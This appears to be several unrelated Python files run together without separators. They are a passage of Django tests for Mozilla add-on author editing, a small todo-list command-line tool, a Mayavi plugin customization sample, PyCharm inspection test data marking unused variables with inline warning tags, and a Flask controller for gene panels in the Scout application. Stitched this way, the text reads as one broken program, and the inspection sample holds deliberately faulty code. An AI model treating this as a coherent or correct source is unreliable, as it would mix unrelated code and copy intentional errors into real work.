listed=True, role=amo.AUTHOR_ROLE_DEV, position=0) data = self.formset(f.initial, u, initial_count=1) r = self.client.post(self.url, data) 
self.assertRedirects(r, self.url, 302) eq_(list(q.all()), [55021, 999]) def test_success_edit_user(self): # Add an author b/c we can't edit anything about the current one. f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=1) data = self.formset(f.initial, u, initial_count=1) self.client.post(self.url, data) eq_(AddonUser.objects.get(addon=3615, user=999).listed, True) # Edit the user we just added. user_form = self.client.get(self.url).context['user_form'] one, two = user_form.initial_forms del two.initial['listed'] empty = dict(user='', listed=True, role=5, position=0) data = self.formset(one.initial, two.initial, empty, initial_count=2) r = self.client.post(self.url, data) self.assertRedirects(r, self.url, 302) eq_(AddonUser.objects.no_cache().get(addon=3615, user=999).listed, False) def test_add_user_twice(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=1) data = self.formset(f.initial, u, u, initial_count=1) r = self.client.post(self.url, data) eq_(r.status_code, 200) eq_(r.context['user_form'].non_form_errors(), ['An author can only be listed once.']) def test_success_delete_user(self): # Add a new user so we have one to delete. data = self.formset(dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_OWNER, position=1), initial_count=0) self.client.post(self.url, data) one, two = self.client.get(self.url).context['user_form'].initial_forms one.initial['DELETE'] = True data = self.formset(one.initial, two.initial, initial_count=2) r = self.client.post(self.url, data) eq_(r.status_code, 302) eq_(999, AddonUser.objects.get(addon=3615).user_id) def test_switch_owner(self): # See if we can transfer ownership in one POST. 
f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['user'] = 'regular@mozilla.com' data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) eq_(999, AddonUser.objects.get(addon=3615).user_id) eq_(ActivityLog.objects.filter( action=amo.LOG.ADD_USER_WITH_ROLE.id).count(), 1) eq_(ActivityLog.objects.filter( action=amo.LOG.REMOVE_USER_WITH_ROLE.id).count(), 1) def test_only_owner_can_edit(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=0) data = self.formset(f.initial, u, initial_count=1) self.client.post(self.url, data) self.client.login(username='regular@mozilla.com', password='password') self.client.post(self.url, data, follow=True) # Try deleting the other AddonUser one, two = self.client.get(self.url).context['user_form'].initial_forms one.initial['DELETE'] = True data = self.formset(one.initial, two.initial, initial_count=2) r = self.client.post(self.url, data, follow=True) eq_(r.status_code, 403) eq_(AddonUser.objects.filter(addon=3615).count(), 2) def test_must_have_listed(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['listed'] = False data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.context['user_form'].non_form_errors(), ['At least one author must be listed.']) def test_must_have_owner(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['role'] = amo.AUTHOR_ROLE_DEV data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) eq_(r.context['user_form'].non_form_errors(), ['Must have at least one owner.']) def test_must_have_owner_delete(self): f = self.client.get(self.url).context['user_form'].initial_forms[0] f.initial['DELETE'] = True data = self.formset(f.initial, initial_count=1) r = self.client.post(self.url, data) 
eq_(r.context['user_form'].non_form_errors(), ['Must have at least one owner.'])
#!/usr/bin/env python
"""dodo -- a tiny flat-file todo manager storing tasks in a DODO file."""
import argparse
import calendar
import json
import re
import time
import os
import sys
from datetime import datetime
from time import mktime

DODO_FILE = os.path.join(os.getcwd(), 'DODO')
VERSION = "0.99"


class TerminalColors(object):
    """
    Color class for listing out dodos
    """
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    END = '\033[0m'

    def __init__(self):
        pass


# Single-character status markers as stored in the DODO file, mapped to
# the human-readable names used on export.
statuses = {
    '+': 'add',
    '*': 'accepted',
    '-': 'rejected',
    '#': 'working',
    '.': 'complete'
}


def pretty_date(date_string):
    """Return a human-friendly relative description of *date_string*.

    *date_string* uses the ``%d-%m-%y %H:%M`` format this tool writes.
    Dates more than a week old (or in the future) fall back to an
    absolute ``%d %b %y`` date.
    """
    timestamp = calendar.timegm(
        (datetime.strptime(date_string, "%d-%m-%y %H:%M")).timetuple())
    # NOTE(review): timegm() interprets the stored time as UTC while
    # fromtimestamp() converts back to local time; stored times are
    # written with time.gmtime() below, so this round-trips -- confirm
    # before changing either side.
    date = datetime.fromtimestamp(timestamp)
    diff = datetime.now() - date
    s = diff.seconds
    if diff.days > 7 or diff.days < 0:
        return date.strftime('%d %b %y')
    elif diff.days == 1:
        return '1 day ago'
    elif diff.days > 1:
        return '{} days ago'.format(diff.days)
    elif s <= 1:
        return 'just now'
    elif s < 60:
        return '{} seconds ago'.format(s)
    elif s < 120:
        return '1 minute ago'
    elif s < 3600:
        # Floor division: "5 minutes ago", not "5.05 minutes ago" (the
        # old true division produced floats on Python 3).
        return '{} minutes ago'.format(s // 60)
    elif s < 7200:
        return '1 hour ago'
    else:
        return '{} hours ago'.format(s // 3600)


def parse_dodo(line):
    """Parse one DODO file line into a task dict.

    Line format: ``#<id> [[<status>]] <<time>> ((user)) {{description}}``.
    Returns None for an empty line; the id and status fields are
    mandatory, the others optional.
    """
    if line:
        do_id = re.search(r"#\d+", line).group()[1:]
        do_status = re.search(r'\[\[\W+\]\]', line).group()[2:-2]
        do_time = re.search(r'(<<.+>>)', line)
        do_description = re.search(r'({{.+}})', line)
        if do_time:
            do_time = do_time.group().replace("<<", "").replace(">>", "")
        do_user = re.search(r'(\(\(.+\)\))', line)
        if do_user:
            do_user = do_user.group().replace("((", "").replace("))", "")
        if do_description:
            do_description = do_description.group().replace(
                "{{", "").replace("}}", "")
        return {
            "id": do_id,
            "time": do_time,
            "user": do_user,
            "status": do_status,
            "description": do_description
        }


def dodo_load(args):
    """Read the DODO file and return a dict of tasks keyed by id."""
    global DODO_FILE
    do_dict = {}
    DODO_FILE = args.file or DODO_FILE
    with open(DODO_FILE, 'r') as file_inst:
        contents = file_inst.readlines()
        for content in contents:
            do_data = parse_dodo(content)
            do_dict.update({do_data["id"]: do_data})
    return do_dict


def dodo_unload(final_do_base):
    """Serialize all tasks (sorted by numeric id) back to the DODO file."""
    content = ""
    for key, value in sorted(iter(final_do_base.items()),
                             key=lambda key_value: int(key_value[0])):
        content += "#%s [[%s]] <<%s>> ((%s)) {{%s}}\n" % (
            value["id"], value["status"], value["time"],
            value["user"], value["description"])
    dodo_write(content, "w")


def dodo_init(args):
    """Create an empty DODO file unless one already exists."""
    file_name = args.file or DODO_FILE
    try:
        try:
            # Probe for an existing file; close the handle so it does
            # not leak (the old code left it open).
            open(file_name, "r").close()
            print("DoDo already exist.")
        except IOError:
            file_inst = open(file_name, "w")
            file_inst.close()
            print("Successfully initialized DoDo")
    except IOError:
        print("Cannot create file in the following location: %s" % file_name)


def dodo_write(content, mode="a"):
    """Write *content* to the DODO file and re-list the tasks."""
    global DODO_FILE, do_base
    with open(DODO_FILE, mode) as file_inst:
        file_inst.write(content)
    dodo_list()


def dodo_new_id():
    """Return the next free numeric task id as a string."""
    if len(do_base) == 0:
        return "1"
    return str(max(int(id) for id in do_base.keys()) + 1)


def dodo_change_status(args, mod_do_base, status):
    """Set *status* on the task given by args.id, creating it if needed."""
    if not args.id:
        print("ID (-id) can't be empty. May be try creating the task first")
        return
    do_entry = mod_do_base.get(args.id)
    if do_entry:
        # Existing task: update the status and any supplied fields.
        do_entry["status"] = status
        if args.desc:
            do_entry["description"] = args.desc
        if args.user:
            do_entry["user"] = args.user
        if args.time:
            do_entry["time"] = args.time
    else:
        # Unknown id: create a fresh entry (description required).
        if not args.desc:
            print("Description (-d) can't be empty")
            return
        do_id = dodo_new_id()
        do_description = args.desc
        do_user = args.user
        do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime())
        mod_do_base[do_id] = {
            "id": do_id,
            "time": do_time,
            "user": do_user,
            "status": status,
            "description": do_description
        }
    dodo_unload(mod_do_base)
    return


def dodo_add(args):
    """Dispatch a task-mutating operation.

    Status markers:
        + add/proposed
        * accepted
        - rejected
        # working
        . complete
    """
    do_user = args.user
    if args.operation in ["add", "propose", "c"]:
        if args.id:
            print("Error: DoDo assigns id for you.")
            exit()
        do_id = dodo_new_id()
        do_description = args.desc
        do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime())
        do_base[do_id] = {
            "id": do_id,
            "time": do_time,
            "user": do_user,
            "status": "+",
            "description": do_description
        }
        dodo_unload(do_base)
    elif args.operation == "accept":
        dodo_change_status(args, do_base, "*")
    elif args.operation == "reject":
        dodo_change_status(args, do_base, "-")
    elif args.operation == "workon":
        dodo_change_status(args, do_base, "#")
    elif args.operation == "finish":
        dodo_change_status(args, do_base, ".")
    # BUG FIX: this was `in ["remove" or "d"]`, which evaluates to
    # ["remove"], so the documented "d" alias never matched.
    elif args.operation in ["remove", "d"]:
        try:
            do_base.pop(args.id)
        except KeyError:
            print("No task with id %s" % args.id)
        dodo_unload(do_base)
    elif args.operation == "flush":
        # Drop every rejected or completed task.
        for do_entry in list(do_base.values()):
            if do_entry["status"] in ["-", "."]:
                do_base.pop(do_entry["id"])
        dodo_unload(do_base)
    return


def dodo_list():
    """Pretty-print all tasks, color-coded by status."""
    global do_base
    print("%s%sID\tStatus\t\tDate(-t)\tOwner(-u)\t\tDescription (-d)\n%s" %
          (TerminalColors.BOLD, TerminalColors.UNDERLINE, TerminalColors.END))
    for key, value in sorted(iter(do_base.items()),
                             key=lambda key_value1: int(key_value1[0])):
        color = TerminalColors.YELLOW
        if value["status"] == ".":
            color = TerminalColors.GREEN
        elif value["status"] in ["-", 'x']:
            color = TerminalColors.RED
        elif value["status"] == "#":
            color = TerminalColors.UNDERLINE + TerminalColors.YELLOW
        elif value["status"] == "+":
            color = TerminalColors.BLUE
        user = value["user"] if value["user"] != "None" else "anonymous"
        human_time = pretty_date(value["time"])
        print("%s%s\t[%s]\t\t%s\t(%s)\t\t%s%s" %
              (color, value["id"], value["status"], human_time, user,
               value["description"], TerminalColors.END))
    print("\n%sAvailable Operations: c accept propose reject workon finish remove d flush\n" \
          "Available Options: -id -d(description) -u(user) -t(time) -f(file)\n" \
          "Status: + proposed - rejected * accepted # working . complete%s" % (
              TerminalColors.BOLD, TerminalColors.END))


def dodo_import(args):
    """
    Sample import JSON format (same as taskwarrior export format)
        {"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending",
        "uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"}
    """
    do_user = args.user
    json_file = args.input
    json_source = json.loads(open(json_file).read())
    for task in json_source:
        do_id = dodo_new_id()
        do_description = task["description"]
        utc_time = time.strptime(task["entry"], "%Y%m%dT%H%M%S%fZ")
        do_time = time.strftime("%d-%m-%y %H:%M", utc_time)
        do_status = "+"
        if task["status"] == "pending":
            do_status = "+"
        if task["status"] == "completed":
            do_status = "."
        do_base[do_id] = {
            "id": do_id,
            "time": do_time,
            "user": do_user,
            "status": do_status,
            "description": do_description
        }
    dodo_unload(do_base)
    print("Imported %d tasks successfully" % len(json_source))


def dodo_export(args):
    """
    {"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending",
    "uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"}
    Time is in UTC
    """
    dodo_data = []
    for instance in sorted(list(do_base.values()),
                           key=lambda value: int(value["id"])):
        dodo_data.append({
            "id": instance["id"],
            "time": instance["time"],
            "user": instance["user"],
            "status": statuses[instance["status"]],
            "description": instance["description"]
        })
    if args.output:
        try:
            file_name = args.output
            with open(file_name, "w") as file_inst:
                file_inst.write(json.dumps(dodo_data))
            print("%sExported DODO to %s%s" % \
                  (TerminalColors.GREEN, file_name, TerminalColors.END))
        except IOError:
            print("%sExport failed; Check for permission to create/edit %s%s" % \
                  (TerminalColors.RED, args.output, TerminalColors.END))
    else:
        print("%sUse -e or --export to <filename.json> to export to a file.%s" % \
              (TerminalColors.YELLOW, TerminalColors.END))
        print("%s" % TerminalColors.GREEN)
        print(dodo_data)
        print("%s" % TerminalColors.END)


def dodo_switch(args):
    """Route the parsed CLI arguments to the matching handler."""
    global do_base
    if args.operation == "init":
        dodo_init(args)
    elif args.operation in ['add', 'propose', 'accept', 'reject', 'workon',
                            'finish', 'flush', 'remove', "c", "d"]:
        dodo_add(args)
    elif args.operation == 'import':
        dodo_import(args)
    elif args.operation == 'export':
        dodo_export(args)
    else:
        dodo_list()


if __name__ == "__main__":
    default_operation = 'list'
    default_user = os.path.split(os.path.expanduser('~'))[-1]

    parser = argparse.ArgumentParser()
    # BUG FIX: 'init', 'import', 'export' and the 'c'/'d' aliases are all
    # handled by dodo_switch()/dodo_add() but were missing from choices,
    # so argparse rejected them before they could run.
    parser.add_argument("operation", nargs='?', default=default_operation,
                        choices=[
                            'accept', 'add', 'c', 'd', 'export', 'finish',
                            'flush', 'import', 'init', 'list', 'propose',
                            'reject', 'remove', 'workon'
                        ],
                        help="The operation to perform")
    parser.add_argument("quick_access", nargs='?', default='',
                        help="Task ID for a operation or Description for the new task")
    parser.add_argument("-d", "--desc", "--description",
                        help="Task Description")
    parser.add_argument("-u", "--user", default=default_user, help="User ID")
    parser.add_argument("-t", "--time",
                        help="Expected/Completed Date - 11-03-2015")
    parser.add_argument("--id", help="List all existing dodos")
    parser.add_argument("-f", "--file", help="DODO filename")
    parser.add_argument("-i", "--input", help="Import from JSON file")
    parser.add_argument("-o", "--output", help="Export to JSON file")
    arguments = parser.parse_args()

    if (arguments.operation == default_operation and
            not os.path.isfile(arguments.file or DODO_FILE)):
        parser.print_help()
        sys.exit(0)

    # A bare positional is an id when numeric, a description otherwise.
    quick_access = arguments.quick_access
    if quick_access:
        if arguments.quick_access.isdigit():
            arguments.id = quick_access
        else:
            arguments.desc = quick_access

    do_base = {}
    if arguments.operation == "init":
        dodo_init(arguments)
    else:
        do_base = dodo_load(arguments)
        dodo_switch(arguments)
""" Sample Mayavi customization file. This code is not to be executed as `mayavi2 -x user_mayavi.py` or `python user_mayavi.py`. Put this file in ~/.mayavi2/user_mayavi.py and rerun mayavi2 to see what it does -- the worker view may not show up by default so you will have to go to View->Other and in the Show View dialog, activate the "Custom Mayavi2 View". The added modules should show up in the menus (Look for UserOutline in the Modules) ____ This module demonstrates how to extend Mayavi. It extends the modules provided by mayavi by adding these to the Mayavi registry. Note that the registry imports customize which in turn imports this file. It also defines an Envisage plugin that is added to the default list of plugins to extend the running mayavi application. This plugin is returned by the `get_plugins()` function. This file must be placed inside the `~/.mayavi2` directory and called `user_mayavi.py`. Please note that `~/.mayavi2` is placed in `sys.path` (if the directory exists) so make sure that you choose your module names carefully (so as not to override any common module names). The file may also be placed anywhere on sys.path and called `site_mayavi.py` for global system level customizations. """ # Author: Prabhu Ramachandran <prabhu@aero.iitb.ac.in> # Copyright (c) 2006-2008, Enthought, Inc. # License: BSD Style. from mayavi.core.registry import registry from mayavi.core.pipeline_info import PipelineInfo from mayavi.core.metadata import ModuleMetadata # Metadata for the new module we want to add -- notice that we use a # factory function here for convenience, we could also use a class but # the reasons for doing this are documented below. 
user_outline = ModuleMetadata( id = "UserOutlineModule", menu_name = "&UserOutline", factory = 'user_mayavi.user_outline', desc = "Draw a cornered outline for given input", tooltip = "Draw a cornered outline for given input", help = "Draw a cornered outline for given input", input_info = PipelineInfo(datasets=['any'], attribute_types=['any'], attributes=['any']) ) # Register the module with the mayavi registry. registry.modules.append(user_outline) ####### # The all important function that returns the plugin we wish to add to # the default mayavi application. def get_plugins(): # We simply return a list containing the WorkerPlugin defined below. return [WorkerPlugin()] ###################################################################### # Thats it, basically. The rest of the code should really be in another # module but is in the same module for convenience here. There are # problems with doing any significant non-core module imports in this # module as documented below. ###################################################################### ###################################################################### # THE CODE BELOW SHOULD REALLY BE IN SEPARATE MODULES. # # The following can very well be in a separate module but I've kept it # here to make this a compact demo of how to customize things. ###################################################################### ###################################################################### # A new module to expose to mayavi. # # WARNING: Do not do other mayavi imports right here like for example: # 'from mayavi.modules.outline import Outline' etc. This is # because the user_mayavi is imported at a time when many of the imports # are not complete and this will cause hard-to-debug circular import # problems. The registry is given only metadata mostly in the form of # strings and this will cause no problem. 
# Therefore to define new modules, we strongly recommend that the modules
# be defined in another module or be defined in a factory function as
# done below.

def user_outline():
    """A factory function that creates a new module to add to the
    pipeline.  Note that the function safely does any mayavi imports
    inside, avoiding any circular imports.
    """
    print("User Outline")
    from mayavi.modules.outline import Outline
    o = Outline(outline_mode='cornered', name='UserOutline')
    return o


######################################################################
# This code simulates something the user would like to do.  In this case
# we just want to create some data, view it with mayavi and modify the
# data.  We want to add this as a view to the standard mayavi.  The code
# below is simply traits code with a few extra things to be able to grab
# the running mayavi instance and script it.  The object we create we
# offer as an envisage service offer -- this instantiates the worker.
# The WorkerPlugin exposes the service offer and shows the view of this
# worker.

import numpy
from traits.api import HasTraits, Range, Button, Instance, List
from traitsui.api import Item, View


######################################################################
# `Worker` class
######################################################################
class Worker(HasTraits):
    """This class basically allows you to create a data set, view it
    and modify the dataset.  This is a rather crude example but
    demonstrates how things can be done.
    """

    # Set by envisage when this is contributed as a ServiceOffer.
    window = Instance('pyface.workbench.api.WorkbenchWindow')

    create_data = Button('Create data')
    reset_data = Button('Reset data')
    view_data = Button('View data')
    scale = Range(0.0, 1.0)
    source = Instance('mayavi.core.source.Source')

    # Our UI view.
    view = View(Item('create_data', show_label=False),
                Item('view_data', show_label=False),
                Item('reset_data', show_label=False),
                Item('scale'),
                resizable=True
                )

    def get_mayavi(self):
        """Return the mayavi Script service of the hosting window."""
        from mayavi.plugins.script import Script
        return self.window.get_service(Script)

    def _make_data(self):
        """Build the sample sinc-like scalar field as a 64^3 float array."""
        dims = [64, 64, 64]
        # NOTE: a dead local (`np = dims[0]*dims[1]*dims[2]`) was removed
        # here; it was never used and shadowed the usual numpy alias.
        x, y, z = numpy.ogrid[-5:5:dims[0]*1j,
                              -5:5:dims[1]*1j,
                              -5:5:dims[2]*1j]
        x = x.astype('f')
        y = y.astype('f')
        z = z.astype('f')
        s = (numpy.sin(x*y*z)/(x*y*z))
        s = s.transpose().copy()  # This makes the data contiguous.
        return s

    def _create_data_fired(self):
        # traits handler: "Create data" button pressed
        mayavi = self.get_mayavi()
        from mayavi.sources.array_source import ArraySource
        s = self._make_data()
        src = ArraySource(transpose_input_array=False, scalar_data=s)
        self.source = src
        mayavi.add_source(src)

    def _reset_data_fired(self):
        # traits handler: "Reset data" button pressed
        self.source.scalar_data = self._make_data()

    def _view_data_fired(self):
        # traits handler: "View data" button pressed
        mayavi = self.get_mayavi()
        from mayavi.modules.outline import Outline
        from mayavi.modules.image_plane_widget import ImagePlaneWidget
        # Visualize the data.
        o = Outline()
        mayavi.add_module(o)
        ipw = ImagePlaneWidget()
        mayavi.add_module(ipw)
        ipw.module_manager.scalar_lut_manager.show_scalar_bar = True
        ipw_y = ImagePlaneWidget()
        mayavi.add_module(ipw_y)
        ipw_y.ipw.plane_orientation = 'y_axes'

    def _scale_changed(self, value):
        # traits handler: the scale slider moved -- perturb the data
        # in place and wrap it back into [0, 1).
        src = self.source
        data = src.scalar_data
        data += value*0.01
        numpy.mod(data, 1.0, data)
        src.update()


######################################################################
# The following code is the small amount of envisage code that brings
# the users code (above) and Envisage/Mayavi UI together.

from envisage.api import Plugin, ServiceOffer


######################################################################
# `WorkerPlugin` class
######################################################################
class WorkerPlugin(Plugin):

    # Extension point Ids.
    SERVICE_OFFERS = 'envisage.ui.workbench.service_offers'
    VIEWS = 'envisage.ui.workbench.views'

    # Services we contribute.
    service_offers = List(contributes_to=SERVICE_OFFERS)

    # Views.
    views = List(contributes_to=VIEWS)

    ######################################################################
    # Private methods.
    def _service_offers_default(self):
        """ Trait initializer. """
        worker_service_offer = ServiceOffer(
            protocol='user_mayavi.Worker',
            factory='user_mayavi.Worker'
        )
        return [worker_service_offer]

    def _views_default(self):
        """ Trait initializer. """
        return [self._worker_view_factory]

    def _worker_view_factory(self, window, **traits):
        """ Factory method for the current selection of the engine. """
        from pyface.workbench.traits_ui_view import TraitsUIView

        worker = window.get_service(Worker)
        tui_worker_view = TraitsUIView(obj=worker,
                                       view='view',
                                       id='user_mayavi.Worker.view',
                                       name='Custom Mayavi2 View',
                                       window=window,
                                       position='left',
                                       **traits
                                       )
        return tui_worker_view

# END OF CODE THAT SHOULD REALLY BE IN SEPARATE MODULES.
######################################################################

if __name__ == '__main__':
    import sys
    print("*"*80)
    print("ERROR: This script isn't supposed to be executed.")
    print(__doc__)
    print("*"*80)
    from traits.util.home_directory import get_home_directory
    print("Your .mayavi2 directory should be in %s" % get_home_directory())
    print("*"*80)
    sys.exit(1)
def foo1(): <weak_warning descr="Local variable 'aaa' value is not used">aaa</weak_warning> = 1 #fail <weak_warning descr="Local variable 'aaa' value is not used">aaa</weak_warning> = 2 #fail bbb = 1 #pass return bbb def bar(<weak_warning descr="Parameter 'self' value is not used">self</weak_warning>): #fail print("Foo") def baz(<weak_warning descr="Parameter 'a' value is not used">a</weak_warning>): #fail a = 12 print(a) def boo(): <weak_warning descr="Local variable 'k' value is not used">k</weak_warning> = 1 #fail [k for k in [1,3] if True] <weak_warning descr="Local variable 'i' value is not used">i</weak_warning> = 1 #fail for i in [1,2]: print(i) <weak_warning descr="Local variable 'j' value is not used">j</weak_warning> = 1 #fail for j in [-2, -1]: print(j) print (j) class A: def foo(self): #pass pass def baa(): foo.bar = 123 #pass def bla(x): #pass def _bar(): print x return _bar def main(): foo = "foo" #pass bar = "bar" #pass baz = "baz" #pass print "%(foo)s=%(bar)s" % locals() def bar(arg): #pass foo = 1 #pass def <weak_warning descr="Local function 'test' is not used">test</weak_warning>(): #fail print arg return foo #pass class FooBar: @classmethod def foo(cls): #pass pass args[0] = 123 # pass def bzzz(): for _ in xrange(1000): # pass pass def do_something(local_var): global global_var global_var = local_var # pass def srange(n): return {i for i in range(n)} def test_func(): return {(lambda i=py1208: i) for py1208 in range(5)} def foo(): status = None #pass try: status = open('/proc/self/status', 'r') finally: if status is not None: status.close() foo = lambda <weak_warning descr="Parameter 'x' value is not used">x</weak_warning>: False class MySuperClass: def shazam(self, param1, param2): pass class MySubClass(MySuperClass): def shazam(self, param1, param2): pass def test_func(): items = {(lambda i=i: i) for i in range(5)} #pass return {x() for x in items} class MyType(type): def __new__(cls, name, bases, attrs): #pass if name.startswith('None'): 
return None return super(MyType, cls).__new__(cls, name, bases, newattrs) def foo(cls): #fail pass def test(): d = dict() v = 1 #pass try: v = d['key'] except KeyError: v = 2 finally: print v def foo(<weak_warning descr="Parameter 'a' value is not used">a = 123</weak_warning>): # fail Do not use getText() as parameter name print('hello') def loopie(): for x in range(5): pass def locals_inside(): now = datetime.datetime.now() # pass do_smth_with(locals()) class Stat(object): @staticmethod def woof(<weak_warning descr="Parameter 'dog' value is not used">dog="bark"</weak_warning>): # fail print('hello') class A: def __init__(self, *args): #pass self.args = [] for a in args: self.args.append(a) # PY-2574 def f(): # x in "for" is actually used in "if" return [0 for x in range(10) if x] #pass # PY-3031 def f(): # n doesn't leak from the generator expression, so this n is used n = 1 #pass expr = (n for n in xrange(10)) print n return expr # PY-3118 def f(x): # Both y values in "if" can be used later in g, so the first one shouldn't be marked as unused if x: y = 0 #pass else: y = 1 #pass def g(): return y return g # PY-3076 def f(): # Both x values could be used inside g (because there is no inter-procedural CFG) x = 'foo' #pass x = 'bar' #pass def g(): return x x = 'baz' #pass return g # PY-2418 def f(x): # The list shouldn't be marked as unused if isinstance(x, [tuple, list]): #pass pass # PY-3550 def f(): z = 2 #pass def g(z=z): return z return g # PY-4151 def f(g): x = 1 #pass try: x = g() except Exception: pass else: pass print(x) # PY-4154 def a1(): <weak_warning descr="Local variable 'a' value is not used">a</weak_warning> = 1 #fail try: a = 2 except Exception: a = 3 print(a) # PY-4157 def f(g): x = 1 #pass try: pass except Exception: pass else: x = g() print(x) # PY-4147 def f(x, y, z): class C: foo = x #pass def h(self): return z def g(): return y return C, g # PY-4378 def f(c): try: x = c['foo'] except KeyError: if c: x = 42 #pass else: raise except Exception: 
raise return x # PY-5755 def test_same_named_variable_inside_class(): a = 1 #pass class C: def a(self): print(a) return C # PY-5086 def test_only_name_in_local_class(): x = 1 class <weak_warning descr="Local class 'C' is not used">C</weak_warning>: pass return x # PY-7028 class C: def test_unused_params_in_empty_method_1(self, x, y, z): pass def test_unused_params_in_empty_method_2(self, x, y, z): raise Exception() def test_unused_params_in_empty_method_3(self, x, y, z): """Docstring.""" def test_unused_params_in_empty_method_4(self, x, y, z): """Docstring.""" raise Exception() def test_unused_params_in_empty_method_5(self, x, y, z): """Docstring.""" return # PY-7126 def test_unused_empty_function(<weak_warning descr="Parameter 'x' value is not used">x</weak_warning>): pass # PY-7072 def test_unused_variable_in_cycle(x, c): while x > 0: x = x - 1 #pass if c: break # PY-7517 def test_unused_condition_local_with_last_if_in_cycle(c): x = True while x: x = False #pass if c: x = True # PY-7527 def test_unused_empty_init_parameter(): class C(object): def __init__(self, <weak_warning descr="Parameter 'foo' value is not used">foo</weak_warning>): pass def f(self, bar): pass return C # PY-14429 def test_used_local_augmented_assignment(x, y): x += y # PY-19492 class A: def __exit__(self, exc_type, exc_val, exc_tb): print(exc_type) def __eq__(self, other): return False
# -*- coding: utf-8 -*-
import datetime as dt
import logging

from flask import flash, redirect
from flask_login import current_user

from scout.build.panel import build_panel
from scout.parse.panel import parse_genes

LOG = logging.getLogger(__name__)

INHERITANCE_MODELS = ["ar", "ad", "mt", "xr", "xd", "x", "y"]


def shall_display_panel(panel_obj, user):
    """Check if panel shall be displayed based on display status and user privileges."""
    is_visible = not panel_obj.get("hidden", False)
    return is_visible or panel_write_granted(panel_obj, user)


def panel_write_granted(panel_obj, user):
    """Return True if the user may edit the panel.

    Write access is granted when the panel has no maintainer list at all,
    when the user is an admin, or when the user is listed as a maintainer.
    """
    return any(
        ["maintainer" not in panel_obj, user.is_admin, user._id in panel_obj.get("maintainer", [])]
    )


def panel_decode_lines(panel_file):
    """Returns a provided gene panel file as single lines

    Accepts:
        panel_file (werkzeug.datastructures.FileStorage)

    Returns:
        lines(list): list of lines present in gene panel uploaded using the form
    """
    content = panel_file.stream.read()
    lines = None
    try:  # Try to read the csv or txt file containing genes info
        if b"\n" in content:
            # BUG FIX: split("\n") left a trailing "\r" on every line of
            # CRLF (Windows) files; splitlines() handles both endings.
            lines = content.decode("utf-8-sig", "ignore").splitlines()
        else:
            # old Mac-style files delimited by bare carriage returns
            lines = content.decode("windows-1252").split("\r")
    except Exception as err:
        flash(
            "Something went wrong while parsing the gene panel file! ({})".format(err),
            "danger",
        )
    return lines


def create_new_panel(store, request, lines):
    """Create a new gene panel with the data provided using the form

    Args:
        store(scout.adapter.MongoAdapter)
        request(flask.request) request sent by browser form to the /panels endpoint
        lines(list): list of lines containing gene data

    Returns:
        new_panel_id(str): the _id a newly created panel
    """
    new_panel_name = request.form.get("new_panel_name")
    new_panel_id = new_panel(
        store=store,
        institute_id=request.form["institute"],
        panel_name=new_panel_name,
        display_name=request.form["display_name"] or new_panel_name.replace("_", " "),
        csv_lines=lines,
        maintainer=[current_user._id],
        description=request.form["description"],
    )
    if new_panel_id is None:
        return None

    flash("New gene panel added: {}!".format(new_panel_name), "success")
    return new_panel_id


def update_existing_panel(store, request, lines):
    """Update an existing panel by replacing its genes or adding genes to the existing ones

    Args:
        store(scout.adapter.MongoAdapter)
        request(flask.request) request sent by browser form to the /panels endpoint
        lines(list): list of lines containing gene data

    Returns:
        panel_obj.get("_id") (str): the _id of the panel the user is editing
    """
    panel_name = request.form["panel_name"]
    update_option = request.form["modify_option"]

    panel_obj = store.gene_panel(panel_name)
    if panel_obj is None:
        return None

    if panel_write_granted(panel_obj, current_user):
        panel_obj = update_panel(
            store=store,
            panel_name=panel_name,
            csv_lines=lines,
            option=update_option,
        )
    else:
        flash(
            "Permission denied: please ask a panel maintainer or admin for help.",
            "danger",
        )
    # redirect back to the panel page in either case
    return panel_obj.get("_id")


def panel_create_or_update(store, request):
    """Process a user request to create a new gene panel

    Args:
        store(scout.adapter.MongoAdapter)
        request(flask.request) request sent by browser form to the /panels endpoint

    Returns:
        redirect_id(str): the ID of the panel to redirect the page to
    """
    redirect_id = None
    panel_file = request.files["panel_file"]
    lines = panel_decode_lines(panel_file)
    if not lines:
        return redirect(request.referrer)

    # check if a new panel should be created or the user is modifying an existing one
    if request.form.get("new_panel_name"):  # Create a new panel
        redirect_id = create_new_panel(store, request, lines)
    else:  # Update an existing panel
        redirect_id = update_existing_panel(store, request, lines)

    return redirect_id


def panel(store, panel_obj):
    """Preprocess a panel of genes."""
    panel_obj["institute"] = store.institute(panel_obj["institute"])
    full_name = "{} ({})".format(panel_obj["display_name"], panel_obj["version"])
    panel_obj["name_and_version"] = full_name
    maintainers = panel_obj.get("maintainer") or []
    # resolve maintainer user ids to display names, skipping unknown users
    panel_obj["maintainer_names"] = [
        maintainer_obj.get("name")
        for maintainer_obj in (
            store.user(user_id=maintainer_id) for maintainer_id in maintainers
        )
        if maintainer_obj is not None
    ]
    return dict(panel=panel_obj)


def existing_gene(store, panel_obj, hgnc_id):
    """Check if gene is already added to a panel."""
    # NOTE: default was `{}` although "genes" holds a list; `[]` is the
    # intended empty value (iteration behavior is identical).
    existing_genes = {gene["hgnc_id"]: gene for gene in panel_obj.get("genes", [])}
    return existing_genes.get(hgnc_id)


